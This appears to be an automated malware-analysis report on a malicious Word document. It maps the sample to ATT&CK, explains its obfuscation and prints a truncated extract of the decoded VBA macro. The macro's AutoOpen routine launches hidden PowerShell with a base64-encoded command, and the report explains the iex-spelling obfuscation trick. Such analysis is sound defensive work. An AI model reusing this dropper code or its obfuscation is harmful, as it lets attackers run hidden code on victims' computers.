Verdict: MALICIOUS
Risk score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office (OLE) document carrying a VBA macro. The Autoopen procedure in ThisDocument calls IliiOwThNXo, which builds a command line with Shell(... + Chr(vbKeyP) + ...) and runs it with vbHide. Chr(vbKeyP) yields "P", and the string-builder functions in module zzckFrYYC (OZBGiUw, UEWdJEAOsON, ...) supply "owersHeLL -WinDowsTyle hidden -e " followed by a base64 blob, so the macro launches a hidden PowerShell process with an encoded command. The remaining statements in the macro (Cos/Chr/ChrB arithmetic and bare numeric assignments, all under On Error Resume Next) are filler that never touches the command string. The -e argument is base64 of UTF-16LE text; the part that survives in the preview decodes to `.((geT-vaRIABle '*mDr*').naME[3,11,2]-joIn'')( (("{17}{10}{47}...`, which is the common trick of spelling `iex` from the letters of MaximumDriveCount (the only variable matching *mDr* in a default session) and feeding it a command reassembled from a format string. The download URL and the second-stage details sit in the truncated part of the payload, so the downloader role is inferred from this structure and from the ClamAV detection Doc.Dropper.Agent-6556818-0 rather than from an observed URL; the only URL the parser extracted is an OOXML schema namespace, not a network indicator.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6556818-0 [critical; CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6556818-0.
- VBA macros detected [medium; OLE_VBA_MACROS; 3 related findings]: document contains VBA macro code.
- Shell() call in VBA [critical; OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high; OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]: compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the rule's generic description: for this sample a VBA project was recovered (see the extracted macros.bas below), so the marker adds little beyond the AutoOpen finding.
- Embedded URL [info; EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15765 bytes | 5c554edb395bb0d18093e4f1d18f250f0c3f3c1b680b12d11ec04912eebea496 |

Preview of the extracted script (first 1,000 lines; the report cuts it off mid-string). The dump concatenates two modules: ThisDocument (VB_Name "wvjUjsVjRBrV"), holding Autoopen and the Shell() call, and a standard module "zzckFrYYC" holding the string builders. Lines of the form `x = y - Cos(z) * 1 - Chr(n) / m - ChrB(w)` and bare numeric assignments are filler that never affects the command string; only the quoted fragments and the final `OZBGiUw = ...` style sums matter.

```vb
Attribute VB_Name = "wvjUjsVjRBrV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwYUlUitb()
On Error Resume Next
jcmsY = XkTIEv - Cos(JjKCSM) * 1 - Chr(46272) / 791 - ChrB(XXtizw)
ILfkQ = 29731
AAoik = TCpLf - Cos(jSmIu) * 1 - Chr(56226) / 7718 - ChrB(EOwqi)
kKzYKN = 87619
jwYUlUitb = OZBGiUw + UEWdJEAOsON + NujwnRHpS + MGlChHC + fcNMwK + DcVRRKB + GBFrAMFOT + mNAujY + anVmvLWiMQk
JCiin = PUihCm - Cos(hVClH) * 1 - Chr(24438) / 28010 - ChrB(mCwzI)
IFQAS = 37564
End Function
Sub Autoopen()
On Error Resume Next
JkiMp = ljfQn - Cos(NDovnD) * 1 - Chr(828) / 59615 - ChrB(XzjjfW)
PSjkS = 84634
IliiOwThNXo (jwYUlUitb)
lXYSB = jGlKGu - Cos(TKdzR) * 1 - Chr(77948) / 47133 - ChrB(kwdKoi)
NjCaV = 58885
End Sub
Function IliiOwThNXo(wuUwBwzUY)
On Error Resume Next
XOlwB = RNVck - Cos(nFpjS) * 1 - Chr(57658) / 37508 - ChrB(AYvHNz)
sCHjZ = 78939
mOMTm = UWdAa - Cos(qPYzkw) * 1 - Chr(4659) / 83791 - ChrB(wTdkC)
YLOwL = 26544
lpqioDlwUHX = Shell(iTufUbVfRZ + Chr(vbKeyP) + UpMwoZj + wuUwBwzUY, vbHide)
SaXzr = Sivuh - Cos(IzUCXj) * 1 - Chr(43431) / 95148 - ChrB(ouiik)
vLOEP = 45426
End Function
Attribute VB_Name = "zzckFrYYC"
Function OZBGiUw()
On Error Resume Next
rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH)
dTszz = 87180
ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC"
QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS)
QiAvb = 77451
XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A"
zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz)
wtXBAP = 22323
jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD"
WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL)
dbZww = 85519
vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf"
OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr
End Function
Function UEWdJEAOsON()
On Error Resume Next
rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv)
iTFru = 45208
nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A"
VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm)
rRCLb = 81410
TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA"
sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok)
DkEsK = 33068
msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA"
wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF)
qkwzm = 89196
IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ"
QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj)
DUNNY = 823
OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD"
balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX)
FbsbGY = 83805
uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf"
WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj)
PCaRa = 91740
HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7"
qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw)
zaCKU = 6857
rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA"
fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj)
XbtEDs = 72163
ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAO ... (truncated)
```